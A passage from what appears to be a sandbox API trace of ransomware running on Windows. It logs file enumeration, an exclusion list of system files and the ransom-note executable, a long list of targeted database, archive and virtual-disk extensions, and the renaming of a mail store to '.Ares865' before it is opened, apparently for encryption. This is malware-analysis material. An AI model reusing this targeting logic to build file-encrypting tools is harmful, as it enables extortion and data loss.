(HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0064.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0064.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0064.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0064.238] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0064.240] CloseHandle (hObject=0x164) returned 1 [0064.241] CloseHandle (hObject=0x154) returned 1 [0064.243] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0064.243] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0064.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0064.271] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a8e6b80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0064.271] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0064.271] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e9680, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64e9680, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2ab7545, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x206000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="aoldtz.exe") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="..") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="windows") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="bootmgr") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="temp") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="pagefile.sys") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="boot") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="ids.txt") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="ntuser.dat") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="perflogs") returned 1 [0064.271] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="MSBuild") returned 1 [0064.271] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0064.271] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 83 [0064.271] lstrcpyW (in: lpString1=0x2cce48e, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0064.271] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0064.271] lstrlenW (lpString="Ares865") returned 7 [0064.271] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0064.271] lstrlenW (lpString=".dll") returned 4 [0064.272] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".dll") returned 1 [0064.272] lstrlenW (lpString=".lnk") returned 4 [0064.272] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".lnk") returned 1 [0064.272] lstrlenW (lpString=".ini") returned 4 [0064.272] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".ini") returned 1 [0064.272] lstrlenW (lpString=".sys") returned 4 [0064.272] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".sys") returned 1 [0064.272] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0064.272] lstrlenW (lpString="bak") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="bak") returned 1 [0064.272] lstrlenW (lpString="ba_") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="ba_") returned 1 [0064.272] lstrlenW (lpString="dbb") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="dbb") returned 1 [0064.272] lstrlenW (lpString="vmdk") returned 4 [0064.272] lstrcmpiW (lpString1="tore", lpString2="vmdk") returned -1 [0064.272] lstrlenW (lpString="rar") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="rar") returned -1 [0064.272] lstrlenW (lpString="zip") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="zip") returned -1 [0064.272] lstrlenW (lpString="tgz") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="tgz") returned -1 [0064.272] lstrlenW (lpString="vbox") returned 4 [0064.272] lstrcmpiW (lpString1="tore", lpString2="vbox") returned -1 [0064.272] lstrlenW (lpString="vdi") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="vdi") returned -1 [0064.272] lstrlenW (lpString="vhd") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="vhd") returned -1 [0064.272] lstrlenW (lpString="vhdx") returned 4 [0064.272] lstrcmpiW (lpString1="tore", lpString2="vhdx") returned -1 [0064.272] lstrlenW (lpString="avhd") returned 4 [0064.272] lstrcmpiW (lpString1="tore", lpString2="avhd") returned 1 [0064.272] lstrlenW (lpString="db") returned 2 [0064.272] lstrcmpiW (lpString1="re", lpString2="db") returned 1 [0064.272] lstrlenW (lpString="db2") returned 3 [0064.272] lstrcmpiW (lpString1="ore", lpString2="db2") returned 1 [0064.272] lstrlenW (lpString="db3") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="db3") returned 1 [0064.273] lstrlenW (lpString="dbf") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="dbf") returned 1 [0064.273] lstrlenW (lpString="mdf") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="mdf") returned 1 [0064.273] lstrlenW (lpString="mdb") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="mdb") returned 1 [0064.273] lstrlenW (lpString="sql") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="sql") returned -1 [0064.273] lstrlenW (lpString="sqlite") returned 6 [0064.273] lstrcmpiW (lpString1="eStore", lpString2="sqlite") returned -1 [0064.273] lstrlenW (lpString="sqlite3") returned 7 [0064.273] lstrcmpiW (lpString1="geStore", lpString2="sqlite3") returned -1 [0064.273] lstrlenW (lpString="sqlitedb") returned 8 [0064.273] lstrcmpiW (lpString1="ageStore", lpString2="sqlitedb") returned -1 [0064.273] lstrlenW (lpString="xml") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="xml") returned -1 [0064.273] lstrlenW (lpString="$er") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="$er") returned 1 [0064.273] lstrlenW (lpString="4dd") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="4dd") returned 1 [0064.273] lstrlenW (lpString="4dl") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="4dl") returned 1 [0064.273] lstrlenW (lpString="^^^") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="^^^") returned 1 [0064.273] lstrlenW (lpString="abs") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="abs") returned 1 [0064.273] lstrlenW (lpString="abx") returned 3 [0064.273] lstrcmpiW (lpString1="ore", lpString2="abx") returned 1 [0064.273] lstrlenW (lpString="accdb") returned 5 [0064.273] lstrcmpiW (lpString1="Store", lpString2="accdb") returned 1 [0064.273] lstrlenW (lpString="accdc") returned 5 [0064.273] lstrcmpiW (lpString1="Store", lpString2="accdc") returned 1 [0064.273] lstrlenW (lpString="accde") returned 5 [0064.273] lstrcmpiW (lpString1="Store", lpString2="accde") returned 1 [0064.273] lstrlenW (lpString="accdr") returned 5 [0064.273] lstrcmpiW (lpString1="Store", lpString2="accdr") returned 1 [0064.273] lstrlenW (lpString="accdt") returned 5 [0064.274] lstrcmpiW (lpString1="Store", lpString2="accdt") returned 1 [0064.274] lstrlenW (lpString="accdw") returned 5 [0064.274] lstrcmpiW (lpString1="Store", lpString2="accdw") returned 1 [0064.274] lstrlenW (lpString="accft") returned 5 [0064.274] lstrcmpiW (lpString1="Store", lpString2="accft") returned 1 [0064.274] lstrlenW (lpString="adb") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="adb") returned 1 [0064.274] lstrlenW (lpString="adb") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="adb") returned 1 [0064.274] lstrlenW (lpString="ade") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="ade") returned 1 [0064.274] lstrlenW (lpString="adf") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="adf") returned 1 [0064.274] lstrlenW (lpString="adn") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="adn") returned 1 [0064.274] lstrlenW (lpString="adp") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="adp") returned 1 [0064.274] lstrlenW (lpString="alf") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="alf") returned 1 [0064.274] lstrlenW (lpString="ask") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="ask") returned 1 [0064.274] lstrlenW (lpString="btr") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="btr") returned 1 [0064.274] lstrlenW (lpString="cat") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="cat") returned 1 [0064.274] lstrlenW (lpString="cdb") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="cdb") returned 1 [0064.274] lstrlenW (lpString="ckp") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="ckp") returned 1 [0064.274] lstrlenW (lpString="cma") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="cma") returned 1 [0064.274] lstrlenW (lpString="cpd") returned 3 [0064.274] lstrcmpiW (lpString1="ore", lpString2="cpd") returned 1 [0064.274] lstrlenW (lpString="dacpac") returned 6 [0064.274] lstrcmpiW (lpString1="eStore", lpString2="dacpac") returned 1 [0064.275] lstrlenW (lpString="dad") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dad") returned 1 [0064.275] lstrlenW (lpString="dadiagrams") returned 10 [0064.275] lstrcmpiW (lpString1="ssageStore", lpString2="dadiagrams") returned 1 [0064.275] lstrlenW (lpString="daschema") returned 8 [0064.275] lstrcmpiW (lpString1="ageStore", lpString2="daschema") returned -1 [0064.275] lstrlenW (lpString="db-journal") returned 10 [0064.275] lstrcmpiW (lpString1="ssageStore", lpString2="db-journal") returned 1 [0064.275] lstrlenW (lpString="db-shm") returned 6 [0064.275] lstrcmpiW (lpString1="eStore", lpString2="db-shm") returned 1 [0064.275] lstrlenW (lpString="db-wal") returned 6 [0064.275] lstrcmpiW (lpString1="eStore", lpString2="db-wal") returned 1 [0064.275] lstrlenW (lpString="dbc") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dbc") returned 1 [0064.275] lstrlenW (lpString="dbs") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dbs") returned 1 [0064.275] lstrlenW (lpString="dbt") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dbt") returned 1 [0064.275] lstrlenW (lpString="dbv") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dbv") returned 1 [0064.275] lstrlenW (lpString="dbx") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dbx") returned 1 [0064.275] lstrlenW (lpString="dcb") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dcb") returned 1 [0064.275] lstrlenW (lpString="dct") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dct") returned 1 [0064.275] lstrlenW (lpString="dcx") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dcx") returned 1 [0064.275] lstrlenW (lpString="ddl") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="ddl") returned 1 [0064.275] lstrlenW (lpString="dlis") returned 4 [0064.275] lstrcmpiW (lpString1="tore", lpString2="dlis") returned 1 [0064.275] lstrlenW (lpString="dp1") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dp1") returned 1 [0064.275] lstrlenW (lpString="dqy") returned 3 [0064.275] lstrcmpiW (lpString1="ore", lpString2="dqy") returned 1 [0064.275] lstrlenW (lpString="dsk") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="dsk") returned 1 [0064.276] lstrlenW (lpString="dsn") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="dsn") returned 1 [0064.276] lstrlenW (lpString="dtsx") returned 4 [0064.276] lstrcmpiW (lpString1="tore", lpString2="dtsx") returned 1 [0064.276] lstrlenW (lpString="dxl") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="dxl") returned 1 [0064.276] lstrlenW (lpString="eco") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="eco") returned 1 [0064.276] lstrlenW (lpString="ecx") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="ecx") returned 1 [0064.276] lstrlenW (lpString="edb") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="edb") returned 1 [0064.276] lstrlenW (lpString="epim") returned 4 [0064.276] lstrcmpiW (lpString1="tore", lpString2="epim") returned 1 [0064.276] lstrlenW (lpString="fcd") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fcd") returned 1 [0064.276] lstrlenW (lpString="fdb") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fdb") returned 1 [0064.276] lstrlenW (lpString="fic") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fic") returned 1 [0064.276] lstrlenW (lpString="flexolibrary") returned 12 [0064.276] lstrcmpiW (lpString1="MessageStore", lpString2="flexolibrary") returned 1 [0064.276] lstrlenW (lpString="fm5") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fm5") returned 1 [0064.276] lstrlenW (lpString="fmp") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fmp") returned 1 [0064.276] lstrlenW (lpString="fmp12") returned 5 [0064.276] lstrcmpiW (lpString1="Store", lpString2="fmp12") returned 1 [0064.276] lstrlenW (lpString="fmpsl") returned 5 [0064.276] lstrcmpiW (lpString1="Store", lpString2="fmpsl") returned 1 [0064.276] lstrlenW (lpString="fol") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fol") returned 1 [0064.276] lstrlenW (lpString="fp3") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fp3") returned 1 [0064.276] lstrlenW (lpString="fp4") returned 3 [0064.276] lstrcmpiW (lpString1="ore", lpString2="fp4") returned 1 [0064.277] lstrlenW (lpString="fp5") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="fp5") returned 1 [0064.277] lstrlenW (lpString="fp7") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="fp7") returned 1 [0064.277] lstrlenW (lpString="fpt") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="fpt") returned 1 [0064.277] lstrlenW (lpString="frm") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="frm") returned 1 [0064.277] lstrlenW (lpString="gdb") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="gdb") returned 1 [0064.277] lstrlenW (lpString="gdb") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="gdb") returned 1 [0064.277] lstrlenW (lpString="grdb") returned 4 [0064.277] lstrcmpiW (lpString1="tore", lpString2="grdb") returned 1 [0064.277] lstrlenW (lpString="gwi") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="gwi") returned 1 [0064.277] lstrlenW (lpString="hdb") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="hdb") returned 1 [0064.277] lstrlenW (lpString="his") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="his") returned 1 [0064.277] lstrlenW (lpString="ib") returned 2 [0064.277] lstrcmpiW (lpString1="re", lpString2="ib") returned 1 [0064.277] lstrlenW (lpString="idb") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="idb") returned 1 [0064.277] lstrlenW (lpString="ihx") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="ihx") returned 1 [0064.277] lstrlenW (lpString="itdb") returned 4 [0064.277] lstrcmpiW (lpString1="tore", lpString2="itdb") returned 1 [0064.277] lstrlenW (lpString="itw") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="itw") returned 1 [0064.277] lstrlenW (lpString="jet") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="jet") returned 1 [0064.277] lstrlenW (lpString="jtx") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="jtx") returned 1 [0064.277] lstrlenW (lpString="kdb") returned 3 [0064.277] lstrcmpiW (lpString1="ore", lpString2="kdb") returned 1 [0064.277] lstrlenW (lpString="kexi") returned 4 [0064.277] lstrcmpiW (lpString1="tore", lpString2="kexi") returned 1 [0064.278] lstrlenW (lpString="kexic") returned 5 [0064.278] lstrcmpiW (lpString1="Store", lpString2="kexic") returned 1 [0064.278] lstrlenW (lpString="kexis") returned 5 [0064.278] lstrcmpiW (lpString1="Store", lpString2="kexis") returned 1 [0064.278] lstrlenW (lpString="lgc") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="lgc") returned 1 [0064.278] lstrlenW (lpString="lwx") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="lwx") returned 1 [0064.278] lstrlenW (lpString="maf") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="maf") returned 1 [0064.278] lstrlenW (lpString="maq") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="maq") returned 1 [0064.278] lstrlenW (lpString="mar") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mar") returned 1 [0064.278] lstrlenW (lpString="marshal") returned 7 [0064.278] lstrcmpiW (lpString1="geStore", lpString2="marshal") returned -1 [0064.278] lstrlenW (lpString="mas") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mas") returned 1 [0064.278] lstrlenW (lpString="mav") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mav") returned 1 [0064.278] lstrlenW (lpString="maw") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="maw") returned 1 [0064.278] lstrlenW (lpString="mdbhtml") returned 7 [0064.278] lstrcmpiW (lpString1="geStore", lpString2="mdbhtml") returned -1 [0064.278] lstrlenW (lpString="mdn") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mdn") returned 1 [0064.278] lstrlenW (lpString="mdt") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mdt") returned 1 [0064.278] lstrlenW (lpString="mfd") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mfd") returned 1 [0064.278] lstrlenW (lpString="mpd") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mpd") returned 1 [0064.278] lstrlenW (lpString="mrg") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mrg") returned 1 [0064.278] lstrlenW (lpString="mud") returned 3 [0064.278] lstrcmpiW (lpString1="ore", lpString2="mud") returned 1 [0064.279] lstrlenW (lpString="mwb") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="mwb") returned 1 [0064.279] lstrlenW (lpString="myd") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="myd") returned 1 [0064.279] lstrlenW (lpString="ndf") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="ndf") returned 1 [0064.279] lstrlenW (lpString="nnt") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="nnt") returned 1 [0064.279] lstrlenW (lpString="nrmlib") returned 6 [0064.279] lstrcmpiW (lpString1="eStore", lpString2="nrmlib") returned -1 [0064.279] lstrlenW (lpString="ns2") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="ns2") returned 1 [0064.279] lstrlenW (lpString="ns3") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="ns3") returned 1 [0064.279] lstrlenW (lpString="ns4") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="ns4") returned 1 [0064.279] lstrlenW (lpString="nsf") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="nsf") returned 1 [0064.279] lstrlenW (lpString="nv") returned 2 [0064.279] lstrcmpiW (lpString1="re", lpString2="nv") returned 1 [0064.279] lstrlenW (lpString="nv2") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="nv2") returned 1 [0064.279] lstrlenW (lpString="nwdb") returned 4 [0064.279] lstrcmpiW (lpString1="tore", lpString2="nwdb") returned 1 [0064.279] lstrlenW (lpString="nyf") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="nyf") returned 1 [0064.279] lstrlenW (lpString="odb") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="odb") returned 1 [0064.279] lstrlenW (lpString="odb") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="odb") returned 1 [0064.279] lstrlenW (lpString="oqy") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="oqy") returned 1 [0064.279] lstrlenW (lpString="ora") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="ora") returned 1 [0064.279] lstrlenW (lpString="orx") returned 3 [0064.279] lstrcmpiW (lpString1="ore", lpString2="orx") returned -1 [0064.280] lstrlenW (lpString="owc") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="owc") returned -1 [0064.280] lstrlenW (lpString="p96") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="p96") returned -1 [0064.280] lstrlenW (lpString="p97") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="p97") returned -1 [0064.280] lstrlenW (lpString="pan") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="pan") returned -1 [0064.280] lstrlenW (lpString="pdb") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="pdb") returned -1 [0064.280] lstrlenW (lpString="pdm") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="pdm") returned -1 [0064.280] lstrlenW (lpString="pnz") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="pnz") returned -1 [0064.280] lstrlenW (lpString="qry") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="qry") returned -1 [0064.280] lstrlenW (lpString="qvd") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="qvd") returned -1 [0064.280] lstrlenW (lpString="rbf") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="rbf") returned -1 [0064.280] lstrlenW (lpString="rctd") returned 4 [0064.280] lstrcmpiW (lpString1="tore", lpString2="rctd") returned 1 [0064.280] lstrlenW (lpString="rod") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="rod") returned -1 [0064.280] lstrlenW (lpString="rodx") returned 4 [0064.280] lstrcmpiW (lpString1="tore", lpString2="rodx") returned 1 [0064.280] lstrlenW (lpString="rpd") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="rpd") returned -1 [0064.280] lstrlenW (lpString="rsd") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="rsd") returned -1 [0064.280] lstrlenW (lpString="sas7bdat") returned 8 [0064.280] lstrcmpiW (lpString1="ageStore", lpString2="sas7bdat") returned -1 [0064.280] lstrlenW (lpString="sbf") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="sbf") returned -1 [0064.280] lstrlenW (lpString="scx") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="scx") returned -1 [0064.280] lstrlenW (lpString="sdb") returned 3 [0064.280] lstrcmpiW (lpString1="ore", lpString2="sdb") returned -1 [0064.281] lstrlenW (lpString="sdc") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="sdc") returned -1 [0064.281] lstrlenW (lpString="sdf") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="sdf") returned -1 [0064.281] lstrlenW (lpString="sis") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="sis") returned -1 [0064.281] lstrlenW (lpString="spq") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="spq") returned -1 [0064.281] lstrlenW (lpString="te") returned 2 [0064.281] lstrcmpiW (lpString1="re", lpString2="te") returned -1 [0064.281] lstrlenW (lpString="teacher") returned 7 [0064.281] lstrcmpiW (lpString1="geStore", lpString2="teacher") returned -1 [0064.281] lstrlenW (lpString="tmd") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="tmd") returned -1 [0064.281] lstrlenW (lpString="tps") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="tps") returned -1 [0064.281] lstrlenW (lpString="trc") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="trc") returned -1 [0064.281] lstrlenW (lpString="trc") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="trc") returned -1 [0064.281] lstrlenW (lpString="trm") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="trm") returned -1 [0064.281] lstrlenW (lpString="udb") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="udb") returned -1 [0064.281] lstrlenW (lpString="udl") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="udl") returned -1 [0064.281] lstrlenW (lpString="usr") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="usr") returned -1 [0064.281] lstrlenW (lpString="v12") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="v12") returned -1 [0064.281] lstrlenW (lpString="vis") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="vis") returned -1 [0064.281] lstrlenW (lpString="vpd") returned 3 [0064.281] lstrcmpiW (lpString1="ore", lpString2="vpd") returned -1 [0064.281] lstrlenW (lpString="vvv") returned 3 [0064.282] lstrcmpiW (lpString1="ore", lpString2="vvv") returned -1 [0064.282] lstrlenW (lpString="wdb") returned 3 [0064.282] lstrcmpiW (lpString1="ore", lpString2="wdb") returned -1 [0064.282] lstrlenW (lpString="wmdb") returned 4 [0064.282] lstrcmpiW (lpString1="tore", lpString2="wmdb") returned -1 [0064.282] lstrlenW (lpString="wrk") returned 3 [0064.282] lstrcmpiW (lpString1="ore", lpString2="wrk") returned -1 [0064.282] lstrlenW (lpString="xdb") returned 3 [0064.282] lstrcmpiW (lpString1="ore", lpString2="xdb") returned -1 [0064.282] lstrlenW (lpString="xld") returned 3 [0064.282] lstrcmpiW (lpString1="ore", lpString2="xld") returned -1 [0064.282] lstrlenW (lpString="xmlff") returned 5 [0064.282] lstrcmpiW (lpString1="Store", lpString2="xmlff") returned -1 [0064.282] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.Ares865") returned 105 [0064.282] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.ares865"), dwFlags=0x1) returned 1 [0064.283] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0064.283] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2121728) returned 1 [0064.283] RtlAllocateHeap (HeapHandle=0x2b0000, 